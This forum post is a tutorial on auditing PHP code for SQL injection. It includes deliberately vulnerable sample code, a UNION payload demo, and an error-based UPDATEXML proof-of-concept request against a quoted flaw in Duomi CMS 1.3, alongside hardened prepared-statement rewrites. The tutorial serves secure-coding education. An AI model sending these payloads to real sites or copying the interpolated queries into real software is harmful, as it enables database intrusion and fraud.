esc0rp posted on 2024-11-3 10:57:32

PHP Code Audit: SQL Injection


    <h2 style="color: black; text-align: left; margin-bottom: 10px;">What is SQL injection</h2>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">SQL injection (SQL Injection), often just called injection, is one of the most common security vulnerabilities in web development. It can be used to read sensitive information from the database, or to abuse database features to carry out a whole series of malicious operations such as adding users or exporting files, and in the worst case it can end in the highest privileges on the database or even on the host operating system.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The root cause of SQL injection is that the program does not properly separate user input from the SQL it builds: the attacker submits malicious SQL fragments to the server, the program concatenates that input into the query text and executes it as part of the statement, the original query logic is altered, and the attacker's carefully constructed code runs in addition to (or instead of) what the developer intended. The defining property of the bug is that untrusted data is parsed as part of the SQL grammar rather than treated as a value.</p>
    <h2 style="color: black; text-align: left; margin-bottom: 10px;">SQL injection examples</h2>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Many web developers do not realise that SQL queries can be tampered with, and treat the query as a trusted command. In fact an injected query can bypass the application's access control, defeating authentication and permission checks; worse still, given sufficient database privileges it may even be possible to run operating-system commands on the host through SQL.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The following real-world examples walk through how SQL injection works in detail.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;<img src="http://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu014RKwnciaYX7heuh4VOqltNceyp2pJJHQa5m3QFrv1VSTMII8qOicmclxaVic99FSTJskl5k0IH3aDg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The test code is as follows:</p>
<pre><code class="language-php">&lt;?php
// Deliberately vulnerable test code from the article: the id parameter is
// interpolated straight into the SQL text. The mysql_* extension used here
// was removed in PHP 7; the pattern is what matters.
$uid = $_GET['id'];                                  // read the GET parameter, no validation at all
$sql = "SELECT * FROM userinfo where id=$uid";       // build the query by string interpolation
$conn = mysql_connect('localhost', 'root', 'root');  // connect (as root, a bad practice in itself)
mysql_select_db("sql", $conn);                       // select the database
$result = mysql_query($sql, $conn);                  // execute the (possibly injected) statement
print_r("当前SQL语句: " . $sql . " 结果: ");           // "Current SQL statement: ... Result: "
print_r(mysql_fetch_row($result));                   // print the first result row
?&gt;
</code></pre>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu014RKwnciaYX7heuh4VOqltN25IpOwPPCJBd3DylSPMP9ap64UTYa8ytaRDNfgPAX9JpiaoSzBqP4uQ/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Walking through the code: <code>$uid=$_GET['id']</code> takes the id straight from the query string; <code>$sql="SELECT * FROM userinfo where id=$uid"</code> builds the statement by string interpolation, so whatever the client sent becomes part of the SQL text (this line builds the query, it does not execute it); <code>mysql_connect</code> and <code>mysql_select_db</code> open the database, as root; <code>mysql_query</code> runs the statement; and the two <code>print_r</code> calls print the statement that actually ran and its first row. There is no filtering, quoting or parameter binding anywhere, so a simple injection payload in <code>id</code> can read whatever the database account is allowed to see.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu014RKwnciaYX7heuh4VOqltNMd9tsRQjPXfPZuPprLiaszWIWgG47NeOT4vndZNeDryOFmGClFf8ib5g/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The screenshot shows that the original SQL statement has been altered by the injected input: a UNION SELECT was appended to return the current database user.</p>
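    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">To make the mechanics concrete, here is an added example (not code from the original article) that rebuilds the test code's query two ways: the vulnerable string interpolation next to a PDO prepared statement. It uses an in-memory SQLite table with constructed sample rows so it runs stand-alone; against MySQL the same UNION payload would use <code>user()</code> and <code>version()</code> in place of <code>sqlite_version()</code>. The column names and the sample data are assumptions for the demonstration (the article only names the table).</p>

```php
<?php
declare(strict_types=1);

// Added example, not code from the original article. It rebuilds the test code's
// "SELECT * FROM userinfo where id=$uid" two ways against an in-memory SQLite
// table with constructed sample rows, so the script runs stand-alone. Against
// MySQL the same payload would use user() and version() instead of sqlite_version().

function makeDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Schema and rows are assumptions for the demo (the article only names the table).
    $pdo->exec('CREATE TABLE userinfo (id INTEGER PRIMARY KEY, name TEXT, email TEXT)');
    $pdo->exec("INSERT INTO userinfo VALUES (1, 'alice', 'alice@example.test'),
                                             (2, 'bob',   'bob@example.test')");
    return $pdo;
}

// Vulnerable: the request parameter is pasted into the SQL text, exactly as in
// the test code, so the database parses it as part of the query grammar.
function findUserVulnerable(PDO $pdo, string $uid): array
{
    $sql = "SELECT * FROM userinfo where id=$uid";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened: the value travels to the database separately from the statement
// and is compared as data; it can never change the statement's structure.
// The ctype_digit check is a second, independent barrier for a numeric column.
function findUserSafe(PDO $pdo, string $uid): ?array
{
    if (!ctype_digit($uid)) {
        return null;                                   // reject before any SQL is prepared
    }
    $stmt = $pdo->prepare('SELECT id, name, email FROM userinfo WHERE id = :id');
    $stmt->bindValue(':id', (int) $uid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_NUM);
    return $row === false ? null : $row;
}

$pdo = makeDb();

// The UNION must supply as many columns as userinfo has (3 here), which is why
// an attacker probes the column count first; id=-1 matches nothing, so only the
// attacker-chosen row comes back.
$payload = "-1 UNION SELECT 1, sqlite_version(), 'data the query never meant to expose'";

print_r(findUserVulnerable($pdo, '1'));        // the legitimate lookup
print_r(findUserVulnerable($pdo, $payload));   // the same function, now returning the attacker's row
var_dump(findUserSafe($pdo, '1'));             // the legitimate lookup
var_dump(findUserSafe($pdo, $payload));        // rejected: the payload is not a digit string
```

    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Run it with <code>php example.php</code>. With interpolation, <code>id=-1 UNION SELECT ...</code> suppresses the real row and returns attacker-chosen columns; with the bound parameter the same string would be compared against <code>id</code> as a value, and the <code>ctype_digit</code> guard rejects it before a statement is even prepared. When the driver is MySQL, also pass <code>PDO::ATTR_EMULATE_PREPARES =&gt; false</code> in the PDO options so that binding is done by the server rather than by the client library.</p>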
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Another example: an injection in the latest release (version 1.3) of 多米CMS (Duomi CMS).</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Vulnerable file: member/mypay.php (lines 14-40)</p>
<pre><code class="language-php">if (empty($_SESSION['duomi_user_id'])) {
    showMsg("请先登录", "login.php");                              // "please log in first"
    exit();
}
elseif ($dm == 'mypay') {
    $key = $_POST['cardkey'];                                     // card number, straight from the POST body
    if ($key == "") { showMsg("请输入充值卡号", "-1"); exit; }      // "enter the card number"
    $pwd = $_POST['cardpwd'];                                     // card password, straight from the POST body
    if ($pwd == "") { showMsg("请输入充值卡密码", "-1"); exit; }    // "enter the card password"
    $sqlt = "SELECT * FROM duomi_card where ckey=$key";           // built but never executed: overwritten below
    $sqlt = "SELECT * FROM duomi_card where cpwd=$pwd";           // unquoted, unfiltered $pwd: the injection point
    $row1 = $dsql-&gt;GetOne($sqlt);
    if (!is_array($row1) OR $row1['status'] &lt;&gt; 0) {
        showMsg("充值卡信息有误", "-1"); exit;                      // "card details are wrong"
    } else {
        $uname = $_SESSION['duomi_user_name'];
        $points = $row1['climit'];
        $dsql-&gt;executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname=$uname,status=1 WHERE ckey=$key");
        $dsql-&gt;executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname=$uname,status=1 WHERE cpwd=$pwd");
        $dsql-&gt;executeNoneQuery("UPDATE duomi_member SET points=points+$points WHERE username=$uname");
        showMsg("恭喜!充值成功!", "mypay.php"); exit;                // "recharge successful"
    }
}
else
{
    // ... the excerpt quoted on the page ends here (line 40 of member/mypay.php)
}
</code></pre>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Here the <code>cardpwd</code> parameter is taken from the POST body and placed into the query without any filtering or quoting, which causes the injection. Note also that the first <code>$sqlt</code> (the <code>ckey</code> query) is immediately overwritten by the second, so only the <code>cpwd</code> query is ever executed and the card number is never checked against the database at all. Build the PoC as follows (note that you must have registered a user and be logged in; see lines 1-17 of that file for details):</p>
<pre><code>http://localhost/member/mypay.php?dm=mypay
POST: cardpwd=-1 AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and 1=1
</code></pre>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu014RKwnciaYX7heuh4VOqltNC1P6jiaN5OOCm04sZ8ibvAM1walYrBTImqaqiavcB4MTL40twjBfHg8bA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
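    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">What the PoC does to the original query: the POST value lands in <code>SELECT * FROM duomi_card where cpwd=-1 AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and 1=1</code>. MySQL evaluates <code>UPDATEXML</code>, rejects <code>~user@host~</code> as an XPath expression and quotes that string in its error message, which the page then displays; this is error-based injection, and it is why the screenshot shows the database user rather than a card. The block below is an added example (not Duomi CMS code) showing the recharge step rewritten so that both injection points and the overwritten-query bug are gone: key and password are bound parameters and are checked together, and the "is the card unused?" read and the "mark it used" write are collapsed into one conditional UPDATE inside a transaction. The in-memory SQLite schema and the sample card and member rows are constructed for the demo; MySQL's <code>NOW()</code> is written as <code>CURRENT_TIMESTAMP</code>, which both databases accept.</p>

```php
<?php
declare(strict_types=1);

// Added example, not Duomi CMS code: a hardened rewrite of the recharge step in
// member/mypay.php. Table and column names are the ones in the excerpt; the
// in-memory SQLite database and the sample card and member rows are constructed
// here so the script runs stand-alone. MySQL's NOW() is written as
// CURRENT_TIMESTAMP, which both MySQL and SQLite accept.

function makeDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE duomi_card (ckey TEXT PRIMARY KEY, cpwd TEXT, climit INTEGER,
                                         status INTEGER NOT NULL DEFAULT 0, usetime TEXT, uname TEXT)');
    $pdo->exec('CREATE TABLE duomi_member (username TEXT PRIMARY KEY, points INTEGER NOT NULL DEFAULT 0)');
    $pdo->exec("INSERT INTO duomi_card (ckey, cpwd, climit) VALUES ('CARD-0001', 'p4ss', 100)");
    $pdo->exec("INSERT INTO duomi_member (username, points) VALUES ('alice', 10)");
    return $pdo;
}

/**
 * Redeem a recharge card for the logged-in user. Returns the points credited,
 * or 0 when the key/password pair is unknown or the card was already used.
 *
 * Changes from the original:
 *  - $cardKey and $cardPwd are bound parameters, never part of the SQL text;
 *  - key and password are checked together (the original overwrote the ckey
 *    query with the cpwd query, so the key was never checked at all);
 *  - "is the card unused?" and "mark it used" are one conditional UPDATE inside
 *    a transaction, so two concurrent requests cannot both redeem the same card.
 */
function redeemCard(PDO $pdo, string $username, string $cardKey, string $cardPwd): int
{
    if ($cardKey === '' || $cardPwd === '') {
        return 0;
    }
    $pdo->beginTransaction();
    try {
        $claim = $pdo->prepare(
            'UPDATE duomi_card SET usetime = CURRENT_TIMESTAMP, uname = :uname, status = 1
              WHERE ckey = :ckey AND cpwd = :cpwd AND status = 0'
        );
        $claim->execute([':uname' => $username, ':ckey' => $cardKey, ':cpwd' => $cardPwd]);
        if ($claim->rowCount() !== 1) {
            $pdo->rollBack();
            return 0;                                  // wrong credentials or already used
        }
        $limit = $pdo->prepare('SELECT climit FROM duomi_card WHERE ckey = :ckey');
        $limit->execute([':ckey' => $cardKey]);
        $points = (int) $limit->fetchColumn();

        $credit = $pdo->prepare('UPDATE duomi_member SET points = points + :pts WHERE username = :uname');
        $credit->bindValue(':pts', $points, PDO::PARAM_INT);
        $credit->bindValue(':uname', $username);
        $credit->execute();
        $pdo->commit();
        return $points;
    } catch (Throwable $e) {
        $pdo->rollBack();
        throw $e;
    }
}

$pdo  = makeDb();
$user = 'alice';                                       // in the CMS this is $_SESSION['duomi_user_name']

// The page's PoC body, sent as cardpwd. Bound as a parameter it is compared as a
// string against cpwd, matches no card, and no UPDATEXML is ever evaluated.
$poc = '-1 AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and 1=1';
var_dump(redeemCard($pdo, $user, 'CARD-0001', $poc));   // injection attempt: nothing credited
var_dump(redeemCard($pdo, $user, 'CARD-0001', 'p4ss')); // valid card: climit credited, card marked used
var_dump(redeemCard($pdo, $user, 'CARD-0001', 'p4ss')); // replay: card is already status=1, nothing credited
```

    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Two points of the design are worth keeping even outside this CMS. Checking <code>rowCount()</code> on the conditional UPDATE is what makes redemption atomic: the original code read the card, then wrote it, and two requests arriving together could both pass the <code>status</code> check. And the session username is bound as a parameter too, even though it did not come from the request: the original interpolated <code>$uname</code> into three statements, so any way of getting a crafted username into the session would have been a second injection path.</p>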



